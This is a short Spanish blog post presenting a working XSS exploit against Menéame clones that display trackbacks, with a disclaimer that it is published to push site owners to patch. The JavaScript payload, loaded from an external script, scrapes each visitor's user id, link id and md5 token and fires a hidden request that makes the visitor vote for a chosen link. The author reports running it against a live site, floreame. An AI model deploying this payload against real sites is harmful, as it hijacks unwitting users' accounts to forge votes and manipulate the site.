Finalmente, presento un pequeño exploit que hice para aprovechar la falla comentada en anteriores posts. Lo que hace el exploit es enviar un “ataque” XSS para que el script http://test.buayacorp.com/s.js cargue en la página afectada.

window.onload = function () {
	var doc = document.body.innerHTML;
	var match = /menealo\((\d+),(\d+),\2,'([^']+)'\)/.exec(doc);
	if (match != null && match.length == 4) {
		var img = '<img src="/backend/menealo.php?user=' + match[1] + '&id=' + match[2] + '&md5=' + match[3] + '" style="display:none" />';

		document.write(img);
	}
}

Pueden ver el caso de prueba en floreame, a quienes de antemano pido disculpas por las molestias causadas y sugiero que actualizen a la última versión de el script para solucionar esto. Cada vez que entren en esta dirección, automáticamente estarán meneando el enlace enviado.

Código fuente: http.zip

Disclaimer: Este exploit ha sido publicado con el fin de que los pocos lectores de este sitio ayuden en cierta medida a que los responsables de los diferentes clones de Menéame que muestren el listado de trackbacks, puedan corregir la falla descrita en posts anteriores.